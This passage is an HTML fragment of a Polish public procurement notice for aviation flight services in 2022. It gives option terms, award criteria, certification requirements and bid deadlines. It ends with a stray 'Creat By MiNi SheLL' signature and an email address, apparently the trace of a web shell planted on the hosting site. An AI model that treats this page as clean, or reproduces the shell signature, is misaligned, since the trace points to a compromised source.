class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje możliwość skorzystania z prawa opcji (art. 441 ust. 1 ustawy PZP) polegającego na możliwości zwiększenia podstawowego zakresu usług, maksymalnie o 10%. Skorzystanie przez Zamawiającego z prawa opcji będzie miało zastosowanie w ramach zawartej umowy według ceny jednostkowej za 1 wylot. Uruchomienie prawa opcji nastąpi, na pisemny wniosek Zamawiającego. Realizacja prawa opcji nastąpi w trakcie trwania umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-04-01 do 2022-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierować się następującymi kryteriami oraz w następujący sposób będzie oceniać oferty:<br/>ZADANIE NR 1 - 2<br/><br/>L.p.	Rodzaj kryterium	Liczba punktów (waga)<br/>1	Cena 60<br/>2	Nalot oferowanego samolotu	40<br/><br/>Kryterium „Cena” – 60 pkt.<br/><br/> cena brutto oferty najniżej skalkulowanej <br/> Liczba punktów oferty = ------------------------------------------------------------- x 60<br/> cena brutto badanej oferty <br/> <br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów – 60. Pozostałe oferty zostaną przeliczone według powyższego wzoru. Wynik będzie traktowany jako wartość punktowa oferty w kryterium cena za realizacje zamówienia .<br/><br/>Kryterium „Nalot oferowanego samolotu” – 40 pkt.<br/><br/>Wykonawca w Formularzu ofertowym stanowiącym Załącznik nr 2 do SWZ zobowiązany jest podać informację o nalocie oferowanego samolotu/silnika oferowanego samolotu.<br/>Liczba punktów zostanie przyznana jak poniżej:<br/>•	do 500 godzin – 40 pkt,<br/>•	od 501 do 1000 godzin – 20 pkt,<br/>•	powyżej 1001 godzin – 0 pkt.<br/><br/>Punkty w danym zadaniu przyznane w ramach każdego kryterium zostaną zsumowane. <br/><br/>Jeżeli Wykonawca nie poda w ofercie kryteriów oceny ofert jego oferta zostanie odrzucona na podstawie art. 226 ust. 1 pkt. 5 ustawy PZP.<br/><br/><br/>PUNKTACJA BĘDZIE LICZONA DLA KAŻDEGO ZADANIA OSOBNO !</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Nalot oferowanego samolotu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy:<br/><br/>1)	nie podlegają wykluczeniu na podstawie art. 108 ust. 1 ustawy PZP<br/>2)	spełniają warunki udziału w postępowaniu dotyczące:<br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, jeśli wynika to z odrębnych przepisów:<br/><br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada<br/><br/>•	ważne zgłoszenie działalności usług lotniczych (SPO) do wykonywania operacji specjalistycznych wydane przez Prezesa Urzędu Lotnictwa Cywilnego zgodnie z załącznikiem nr 8 do Rozporządzenia Komisji (UE) Nr 965/2012 – zmiana dotychczasowych usług lotniczych AWC w operacje specjalistyczne (SPO) Zamawiający dopuszcza możliwość posiadania przez Wykonawcę innego dokumentu niż wskazany po przeprowadzeniu postępowania w sprawie uznania certyfikatu zagranicznego lub dokumentu równoważnego wydanego przez upoważnioną władzę innego państwa (zwanego dalej zagranicznym certyfikatem) zgodnie z zapisami rozporządzenia Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 marca 2013r. w sprawie certyfikacji działalności w lotnictwie cywilnym (Dz. U. z 2013 r., poz. 421). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu wykazania braku podstaw do wykluczenia z postępowania <br/>o udzielenie zamówienia w oryginale w formie elektronicznej podpisane kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzone podpisem zaufanym lub elektronicznym podpisem osobistym:<br/><br/>•	Oświadczenia Wykonawcy, w zakresie art. 108 ust. 5 ustawy PZP, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę lub ofertę częściową albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej. Wzór oświadczenia, o którym mowa stanowi Załącznik Nr 4 do SWZ.<br/><br/>•	oświadczenie w celu potwierdzenia aktualności informacji przedstawionych w oświadczeniu, o którym mowa w art. 125 ust.1 w oryginale w formie elektronicznej podpisane kwalifikowanym podpisem elektronicznym lub <br/>w postaci elektronicznej opatrzone podpisem zaufanym lub elektronicznym podpisem osobistym zgodnie z załącznikiem nr 5 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełnienia warunków udziału w postępowaniu <br/>Wykonawca jest zobowiązany złożyć następujące dokumenty:<br/><br/>•	ważne zgłoszenie działalności usług lotniczych (SPO) do wykonywania operacji specjalistycznych wydane przez Prezesa Urzędu Lotnictwa Cywilnego zgodnie z załącznikiem nr 8 do Rozporządzenia Komisji (UE) Nr 965/2012 – zmiana dotychczasowych usług lotniczych AWC <br/>w operacje specjalistyczne (SPO) Zamawiający dopuszcza możliwość posiadania przez Wykonawcę innego dokumentu niż wskazany po przeprowadzeniu postępowania w sprawie uznania certyfikatu zagranicznego lub dokumentu równoważnego wydanego przez upoważnioną władzę innego państwa (zwanego dalej zagranicznym certyfikatem) zgodnie z zapisami rozporządzenia Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 marca 2013r. w sprawie certyfikacji działalności w lotnictwie cywilnym (Dz. U. z 2013 r., poz. 421).</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>Pełnomocnictwo powinno być załączone do oferty i zawierać w szczególności wskazanie:<br/>• postępowania o zamówienie publiczne, którego dotyczą,<br/>• wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>• ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/><br/>Wymagana forma:<br/>Pełnomocnictwo składa się, jako dokument elektroniczny opatrzony kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub osobistym podpisem elektronicznym.<br/><br/>W przypadku gdy pełnomocnictwo zostało wystawione, jako dokument<br/>w postaci papierowej, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub elektronicznym podpisem osobistym, poświadczające zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej.<br/><br/>Poświadczenia zgodności cyfrowego odwzorowania z dokumentem<br/>w postaci papierowej mogą dokonać mocodawcy lub notariusz. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>Zamawiający uzna warunek dotyczący uprawnień, o którym mowa w ust. 1 pkt. 2 lit. b niniejszego rozdziału, za spełniony, jeżeli co najmniej jeden <br/>z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada przedmiotowe uprawnienia i zrealizuje usługę będącą przedmiotem zamówienia, do realizacji której te uprawnienia są wymagane.<br/>W przypadku, o którym mowa w ust. 3 (powyżej) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, <br/>z którego wynika które usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-09 10:10</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platformazakupowa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-09 10:20</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-07</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com